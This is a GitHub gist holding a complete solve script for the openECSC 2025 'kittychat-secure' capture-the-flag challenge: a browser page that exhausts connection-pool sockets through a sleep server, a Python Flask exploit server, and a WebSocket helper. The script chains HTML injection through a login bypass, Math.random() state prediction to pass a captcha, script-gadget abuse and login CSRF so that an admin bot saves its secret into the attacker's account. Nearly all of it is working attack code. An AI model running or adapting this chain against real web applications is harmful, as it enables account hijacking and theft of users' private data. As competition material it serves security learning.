-
-
Save JorianWoltjer/eaabaa1c50b7ee1bc0cff25e6f33bb7a to your computer and use it in GitHub Desktop.
Solve script for openECSC 2025 - kittychat-secure (https://jorianwoltjer.com/blog/p/ctf/openecsc-2025-kittychat-secure)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script> | |
| const TARGET = "http://localhost:3000"; // URL accessible to victim | |
| const MAX_SOCKETS = 256; // 512 on my own Chrome | |
| const SLEEP_SERVER = "sleep.jtw.sh"; // Running https://github.com/salvatore-abello/web-challenges/blob/main/X/salvatoreabello/exploit/sleep-server.go | |
| function sleep(ms) { | |
| return new Promise((resolve) => setTimeout(resolve, ms)); | |
| } | |
| function fetch_long(s) { | |
| controller = new AbortController(); | |
| const signal = controller.signal; | |
| fetch(`http://${s}.${SLEEP_SERVER}/120`, { | |
| mode: "no-cors", | |
| signal: signal, | |
| }); | |
| return controller; | |
| } | |
| function exhaust_sockets() { | |
| // Fill all but one socket | |
| return Promise.all(Array.from({ length: MAX_SOCKETS - 1 }, (_, i) => fetch_long(i))); | |
| } | |
| async function release_once() { | |
| blocker.abort(); | |
| await sleep(0); // Small time for target to make 1 single request | |
| blocker = fetch_long(1337); | |
| } | |
| (async () => { | |
| await sleep(2000); // Wait for main exploit to be sent, and scripts to load | |
| // 11. Exhaust all available sockets, to stall any network requests | |
| await exhaust_sockets(); | |
| console.log("BLOCKING"); | |
| blocker = fetch_long(1337); | |
| // 15. Let target tab fetch current user while still admin (/user) | |
| await sleep(10000); | |
| console.log("Releasing 1st socket"); | |
| await release_once(); | |
| // 16. Let target tab fetch admin's flag (/notes) | |
| await sleep(1000); | |
| console.log("Releasing 2nd socket"); | |
| await release_once(); | |
| await sleep(5000); | |
| // 18. After login CSRF, let target tab continue | |
| console.log("RELEASED ALL"); | |
| blocker.abort(); | |
| // 19. It will fetch /user (now attacker) and save flag with /notes to attacker's account | |
| })(); | |
| </script> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from WebSocketClient import WebSocketClient | |
| from flask import Flask, render_template | |
| from threading import Thread | |
| from time import sleep | |
| import requests | |
| import secrets | |
| import random | |
| import json | |
| import os | |
| import re | |
| # https://gist.github.com/JorianWoltjer/233e4f4e9ca72be98f4b4314b338184b | |
| from predict import solve_and_predict | |
| from wsclient import WebSocketClient | |
| app = Flask(__name__) | |
| HOST = "http://localhost:3000" # URL accessible to attacker | |
| # HOST = "https://9e8cbf4b-b484-40d6-b4d6-fccb6a6cda3e.openec.sc:1337" | |
| WS_HOST = HOST.replace("http:", "ws:").replace("https:", "wss:") | |
| LOCAL_HOST = "http://..." # Attacker's host reachable by victim | |
| SONG_LINKS = json.load(open(os.path.join(os.path.dirname(__file__), | |
| "song_links.json"))) | |
| def random_username(): | |
| """Fitting the /^kitten_[0-9]+$/ regex""" | |
| return f"kitten_{random.getrandbits(32)}" | |
| def trigger_stager(): | |
| with WebSocketClient(WS_HOST) as ws: | |
| # 2. Join as anonymous user | |
| ws.send(json.dumps({"type": "START", "username": random_username()})) | |
| ws.recv() # channel | |
| existing = {u for u in json.loads(ws.recv(timeout=20))["users"] | |
| if re.fullmatch(r"[0-9a-f]{16}", u)} | |
| print(f"{existing=}") | |
| # 3. Trigger admin bot to join | |
| ws.send(json.dumps({"type": "MESSAGE", "text": "!admin"})) | |
| def is_new_admin(msg): | |
| response = json.loads(msg) | |
| if response["type"] != "USERS": | |
| return False | |
| new = {u for u in response["users"] | |
| if re.fullmatch(r"[0-9a-f]{16}", u)} | |
| # 4. If new admin joined, break | |
| return new - existing | |
| ws.recv_until(is_new_admin) | |
| # 5. Quickly redirect to ?msg=1 to allow /message.js gadget | |
| trigger_html('<meta http-equiv=refresh content="0;url=?msg=1">') | |
| sleep(3) # Wait for everything to reload | |
| def get_random_samples(n=20): | |
| with WebSocketClient(WS_HOST) as ws: | |
| ws.send(json.dumps({"type": "START", "username": random_username()})) | |
| samples = [] | |
| for _ in range(n): | |
| ws.send(json.dumps({"type": "MESSAGE", "text": "!song"})) | |
| response = ws.recv_until(lambda msg: "here's a fun song:" in msg) | |
| url = json.loads(response)["text"].split("here's a fun song: ")[1] | |
| samples.append(SONG_LINKS.index(url)) | |
| print("Got sample", len(samples), url) | |
| print("Samples:", samples) | |
| return samples | |
| def trigger_html(html): | |
| with WebSocketClient(WS_HOST) as ws: | |
| # Login bypass by not passing `key` to inject into users list <div> | |
| ws.send(json.dumps({"type": "LOGIN", "username": html})) | |
| ws.send(json.dumps({"type": "START"})) | |
| def exploit(): | |
| # 6. Get 20+ 9-bit samples to solve Math.random() state | |
| samples = get_random_samples(20) | |
| print("Solving and predicting...") | |
| # There is 1 Math.random() call in /chat.js we need to skip | |
| gen = solve_and_predict(samples, offset=1) | |
| captcha_state = [next(gen) > 0.5 for _ in range(9)] | |
| print("Predicted captcha state:", captcha_state) | |
| # 8. Use click gadget to open exploit server in new tab | |
| trigger_html(f''' | |
| <a href="{LOCAL_HOST}" target="_blank" class="redirect"></a> | |
| <p id=message></p> | |
| <script src="/message.js"></script> | |
| ''') | |
| sleep(4) # Wait for 3s setTimeout() | |
| # Preload images to not deal with them in stalled Connection Pool | |
| preload_imgs = ''.join( | |
| f'<img src="captcha/pic_{i}.webp"><img src="captcha/cat_{i}.webp">' for i in range(9)) | |
| # Correct images for /captcha.js to be solved | |
| captcha_imgs = [ | |
| f"<img{' class=selected' if b else ''}>" for b in captcha_state] | |
| trigger_html(f''' | |
| {preload_imgs} | |
| <p id=message></p> | |
| <p id=username></p> | |
| <div class="redirect captcha" id="loadPrivate"></div> | |
| <fake class=captcha> | |
| <button class="redirect">check</button> | |
| <div> | |
| {''.join(captcha_imgs)} | |
| </div> | |
| </fake> | |
| <iframe srcdoc=' | |
| <!-- 13. Add ?msg=1 parameter to allow /message.js gadget to execute --> | |
| <meta http-equiv=refresh content="5;url=about:srcdoc?msg=1"> | |
| <p id=message></p> | |
| <!-- 17. Login CSRF --> | |
| <form action="http://localhost:3000/login" method="post" target="_blank"> | |
| <input type=text name=username value="{username}"> | |
| <input type=text name=password value="{password}"> | |
| <input type=submit class="redirect"> | |
| </form> | |
| <script src="/message.js"></script> | |
| '></iframe> | |
| <script src="/captcha/captcha.js"></script> | |
| <!-- 10. Register onclick= handler for #loadPrivate --> | |
| <script src="/account.js"></script> | |
| <!-- 12. Click the loadPrivateNotes() button to trigger captcha --> | |
| <script src="/message.js"></script> | |
| <!-- 14. Click "check captcha" button (correct due to injected <img>s) --> | |
| <script src="/message.js"></script> | |
| ''') | |
| print("Waiting for admin to save flag...") | |
| sleep(20) | |
| # 20. Flag was saved to attacker's account, simply retrieve it | |
| r = s.post(HOST + "/notes", json={"key": userkey}) | |
| notes = r.json()['notes'] | |
| print("="*40) | |
| print("FLAG:", notes) | |
| print("="*40) | |
| os._exit(0) | |
| @app.route('/') | |
| def index(): | |
| # 9. Bot hits our exploit server, return it the connection pool exhaustion page | |
| return render_template("exploit.html", username=username, password=password) | |
| def register(username, password): | |
| s = requests.Session() | |
| r = s.post(HOST + '/signup', json={ | |
| 'username': username, | |
| 'password': password | |
| }) | |
| assert "account+created" in r.url or "account+already+exists" in r.url, r.url | |
| if "account+already+exists" in r.url: | |
| r = s.post(HOST + '/login', json={ | |
| 'username': username, | |
| 'password': password | |
| }) | |
| assert "/account" in r.url | |
| userkey = s.get(HOST + '/user').json()['userkey'] | |
| return s, userkey | |
| if __name__ == '__main__': | |
| t = Thread(target=app.run, kwargs={"host": "0.0.0.0", "port": 8000}) | |
| t.start() | |
| # 1. Create account to save flag into eventually | |
| print("Registering") | |
| username = "j0r1an_" + secrets.token_hex(4) | |
| password = secrets.token_hex(4) | |
| s, userkey = register(username, password) | |
| print("Registered, userkey:", userkey) | |
| print("Triggering admin bot") | |
| trigger_stager() | |
| exploit() |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import websocket | |
| import threading | |
| import queue | |
| class WebSocketClient: | |
| def __init__(self, url): | |
| self.url = url | |
| self.ws = websocket.WebSocketApp( | |
| url, | |
| on_open=self._on_open, | |
| on_message=self._on_message, | |
| on_close=self._on_close, | |
| on_error=self._on_error | |
| ) | |
| self.recv_queue = queue.Queue() | |
| self.connected_event = threading.Event() | |
| self.thread = threading.Thread(target=self.ws.run_forever) | |
| self.thread.daemon = True | |
| def _on_open(self, ws): | |
| self.connected_event.set() | |
| def _on_message(self, ws, message): | |
| self.recv_queue.put(message) | |
| def _on_close(self, ws, code, msg): | |
| print(f"WebSocket closed: {code} - {msg}") | |
| def _on_error(self, ws, error): | |
| print(f"WebSocket error: {error}") | |
| def send(self, message): | |
| if isinstance(message, bytes): | |
| self.ws.send(message, websocket.ABNF.OPCODE_BINARY) | |
| else: | |
| self.ws.send(message) | |
| def recv(self, timeout=5): | |
| try: | |
| return self.recv_queue.get(timeout=timeout) | |
| except queue.Empty: | |
| raise TimeoutError("No message received in time.") | |
| def recv_until(self, condition_func): | |
| while True: | |
| message = self.recv(timeout=None) | |
| if condition_func(message): | |
| return message | |
| def close(self): | |
| self.ws.close() | |
| self.thread.join(timeout=1) | |
| def __enter__(self): | |
| self.thread.start() | |
| if not self.connected_event.wait(timeout=5): | |
| raise TimeoutError("Could not connect to WebSocket server.") | |
| return self | |
| def __exit__(self, exc_type, exc_val, exc_tb): | |
| self.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment